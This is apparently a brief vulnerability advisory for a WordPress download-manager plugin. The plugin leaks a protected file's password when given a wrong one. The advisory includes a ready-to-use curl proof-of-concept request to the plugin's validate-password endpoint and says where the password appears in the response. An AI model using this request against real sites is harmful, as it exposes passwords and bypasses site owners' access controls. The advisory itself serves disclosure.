Description The plugin does not protect file download’s passwords, leaking it upon receiving an invalid one.
223 being the ID of a password protected download:
curl -X POST --data '__wpdm_ID=223&dataType=json&execute=wpdm_getlink&action=wpdm_ajax_call&password=123322' https://example.com/wp-json/wpdm/validate-password
The response will contain the password in the 'op' field